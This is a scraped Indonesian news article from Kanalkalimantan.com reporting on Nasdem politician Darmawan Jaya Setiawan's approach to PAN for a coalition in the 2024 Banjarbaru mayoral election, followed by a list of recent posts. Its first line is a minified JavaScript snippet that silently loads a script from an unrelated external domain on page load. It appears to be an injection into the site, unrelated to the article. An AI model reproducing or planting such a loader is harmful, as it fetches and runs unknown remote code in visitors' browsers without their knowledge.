(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Jaya Dekati PAN, Upaya Mengulang Koalisi di Pilwali Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – DPD Partai Amanat Nasional (PAN) Kota Banjarbaru kedatangan Darmawan Jaya Setiawan, kader Partai Nasdem yang digadang bertarung dalam Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarbaru 2024.

Darmawan Jaya Setiawan datang mengembalikan formulir pendaftaran pencalonan diri dalam kontestasi Pilwali Banjarbaru, Jumat (24/5/2024) siang.

Jaya -biasa disapa- mengungkapkan hubungan secara personal maupun kepartaian dengan PAN berjalan dengan baik karena pernah sama-sama berjuang di Pilkada 2020.

Baca juga: Pasangan Calon Belum Pasti, Aditya: Titik Akhirnya SK Partai

“Kita ini ingin menjalin persaudaraan dengan sebanyak-banyaknya tokoh politik maupun partai politik,” ujar Darmawan Jaya Setiawan di depan awak media, Jumat (24/5/2024) siang.

Kalau memang ditakdirkan bersama kembali di tahun 2024 ini, sambung Jaya, tentu mereka akan menargetkan hasil yang berbeda dengan sebelumnya.

“Kalau dulu belum menang, maka di 2024 tahun ini kemenangan bagi kita semua,” sebut dia.

Baca juga: Kumpulkan Caleg Terpilih dan Pengurus DPD, PAN Kalsel ‘Panaskan Mesin’ Hadapi Pilgub Kalsel

Jaya dan tim turut ditawarkan kontrak politik oleh PAN, kemudian dia merespon hal tersebut dengan wajar.

“Ketika dari SK sudah muncul pasangan, tentu ada konsekuensi dengan partai-partai pengusung, boleh dikatakan seperti itu hal yang wajar di politik, tapi kita tunggu pada tahap akhir ketika ada kepastian,” kata Jaya.

Senada dengan Jaya, Ketua DPD PAN Banjarbaru, Emi Lasari mengatakan bahwa pasti akan ada evaluasi-evaluasi jika kedua partai politik ini kembali bersama dalam koalisi pasangan calon.

“Apa yang menyebabkan kita menjadi belum berhasil periode lalu, artinya sebagai sahabat kawan dan mitra bahwa target untuk hasil yang sama, sehingga berhasil ke depan,” ujar wakil rakyat di DPRD Banjarbaru ini.

Baca juga: Gerilya Politik Lisa Halaby ke Gerindra Mencari Partai Pengusung

Penjaringan seluruh bakal calon kepala daerah tetap pada proses, kata Emi, DPD PAN akan menyampaikan semua berkas formulir ke DPW dan DPP PAN dengan menambahkan beberapa catatan.

“Seperti saya sampaikan bagaimana komitmen calon, kemudian terkait tambahan berkas yakni hasil survei dan rekomendasi dari partai sendiri itu menjadi bahan pertimbangan kita,” jelasnya.

“Karena ada kader kita yang bertarung di Pilgub, jadi partai mana saja yang menjadi koalisi poros Pilgub itu yang akan jadi pertimbangan untuk poros Pilwali, agar mesin partai berjalan secara efektif,” tandas Emi. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Jemaah Haji Asal Tabalong Wafat Jelang Wukuf Arafah

KANALKALIMANTAN.COM, BANJARMASIN - Kabar duka datang dari Kloter 18 Haji Embarkasi Banjarmasin, seorang jemaah haji… Read More

10 jam ago

Harga Daging Sapi Stabil di Pasar Bauntung Banjarbaru, Ayam Ras Naik Capai Rp31 Ribu per Kg

KANALKALIMANTAN.COM, BANJARBARU - Lapak penjual daging sapi di Pasar Bauntung Kota Banjarbaru Kalimantan Selatan (Kalsel)… Read More

14 jam ago

Kerukunan Mahasiswa HSU Banjarmasin Dikukuhkan, Ini Pesan Ketua DPRD HSU

KANALKALIMANTAN.COM, AMUNTAI - Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Hulu Sungai Utara (HSU) selalu memberikan… Read More

15 jam ago

203 Jemaah Sidrap Ditangkap di Jeddah, Pakai Visa Ziarah Bertahan untuk Berhaji

KANALKALIMANTAN.COM, JEDDAH - Tim Pengawas (Timwas) Haji DPR meminta jemaah calon haji Indonesia yang tidak… Read More

17 jam ago

KPU Banjar Launching Pilkada Kabupaten Banjar 2024

KANALKALIMANTAN.COM, MARTAPURA - Komisi Pemilihan Umum (KPU) Kabupaten Banjar meluncurkan Pemilihan Bupati dan Wakil Bupati… Read More

18 jam ago

Bakti Religi Polsek Banjarbaru Utara, Bersihkan Masjid Sambut Hari Bhayangkara ke-78

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Bhayangkara ke-78, jajaran Kepolisian Sektor (Polsek) Banjarbaru Utara melaksanakan kegiatan… Read More

20 jam ago

This website uses cookies.